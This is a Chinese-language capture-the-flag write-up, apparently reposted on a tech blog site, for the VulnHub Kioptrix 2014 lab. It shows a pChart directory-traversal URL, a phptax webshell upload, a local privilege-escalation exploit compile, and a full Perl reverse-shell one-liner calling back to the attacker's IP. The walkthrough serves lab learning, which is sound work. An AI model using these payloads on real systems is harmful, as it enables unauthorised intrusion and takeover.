| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> KIOPTRIX: LEVEL 1.4-VulnHub靶机学习第六篇 -> 正文阅读 |
|
[PHP知识库]KIOPTRIX: LEVEL 1.4-VulnHub靶机学习第六篇 |
?写在前面:前人栽树后人乘凉,谢谢网上各位大佬的解题思路作为参考学习;这是kioptrix系列最后一篇咯~ 一、实验准备? ? ? ? 1、实验地址:Kioptrix: 2014 (#5) ~ VulnHub ? ? ? ? 2、下载之后,本地解压,用VMware运行该虚拟机; ???????? ? ? ? ? 3、设置Kioptrix Level 1.4与攻击机网络环境,保证在同一局域网; ????????? ? ? ? ? ? ? ? ? ? ? ? ? 4、本实验攻击机使用的是Kali Linux;攻击机IP地址:10.10.10.131 二、情报收集? ? ? ? 1、主机&端口&服务扫描; ? ? ? ? ? ? ? ?
? ? ? ? 2、访问80端口 ? ? ? ? ? ? ? ? - view source; ???????? ????????? ? ? ? ? ? ? ? ? ?- dirsearch目录扫描;
? ? ? ? ? ? ? ? - 搜索pChart2.1.3漏洞;得到目录穿越&XSS漏洞;
? ? ? ? ?3、访问8080端口; ???????? ?三、渗透测试:STEP1? ? ? ? 1、尝试突破80端口,获取有效信息; ? ? ? ? ? ? ? ? - 系统版本FreeBSD 9.0 ? ? ? ? ? ? ? ? - 只能读取准确路径下的文件,通过网络搜索引擎可知,FreeBSD系统下httpd.conf的保存路径为:/usr/local/etc/apache版本号/httpd.conf, 但此前获得的21版本无效,后续尝试目录爆破; ? ? ? ? ?2、利用pChart2.1.3漏洞读取httpd.conf文件; ? ? ? ? ?????????- 访问http://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fusr/ local/etc/apache22/httpd.conf,获得如下信息:访问8080端口,需要更改User-Agent头; ???????? ? ? ? ? ?3、访问8080端口,收集情报; ???????? ? ? ? ? ? ? ? ? - 获得另外一个应用phptax,先尝试漏洞搜索; ? ? ? ? ? ? ? ? - 21833.rb尝试过了,大概是因为EXP源码中没有User-Agent头部的原因,没有利用成功,又不会自己编写EXP,只能放弃; ? ? ? ? ? ? ? ? - 25849.txt提供了一个木马写入的shell:
? ? ? ? ? ? ? ? - 21665.txt提供了命令执行的参数,但是攻击机的nc监听不上,所以暂时放弃;有大佬知道的话希望不吝赐教; 四、渗透测试:STEP二? ? ? ? 1、上传shell ? ? ? ? - 综上所述,我们尝试25849.txt中的方法,上传木马然后getshell; ???????? ? ? ? ? - antsword连接的时候记得添加User-Agent头,连接之后没有明显的提示文件;? ? ? ? ? ? ? ??????????? ????????? ? ? ? ? ?2、上传EXP提权 ? ? ? ? ? ? ? ? ? ? ? ? - gcc 28718.c -o 28718 ? ? ? ? ? ? ? ? - 虽然提权成功,但是需要退出终端重新打开才能获取root权限,可以less读取/root/congrats.txt? ???????? ???????? -------------------------------------------------------------------------------------------------------------------------------- ? ? ? ? ?方案二:无意间在github发现了一个EXP,附链接; ? ? ? ? ? ? ? ? -?GitHub - NHPT/phptaxExploit ? ? ? ? ? ? ? ? - 开启监听端口;nc -lvnp 23235 ? ? ? ? ? ? ? ? - 该EXP通过perl反弹shell,使用时,记得URL编码,如下: perl -e 'use Socket;$i="10.10.10.131";$p=23235;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ? ? ? ? ? ? ? ? - 效果如图所示; ???????? ????????? ?五、写在最后? ? ? ? 这个靶机,包括些博客截图所需,拢共跑了两次,每次都有纠结的地方; ? ? ? ? - 首先我们观察最后python写的这个EXP,用的是开始我没有试验出来的21665.txt中所述的点;才意识到靶机应该是对nc的shell反弹做了限制; ? ? ? ? - 其次普通一句话🐴好像并不能用于antsword的连接; ? ? ? ? - 第一次做的时候针对httpd.conf得路径也是一脸懵,写这个blog的时候才想起可以用burp模糊注入跑到/usr/local/etc/apache?/目录; ? ? ? ? - 学无止境,加油吧! |
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/23 6:29:31- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |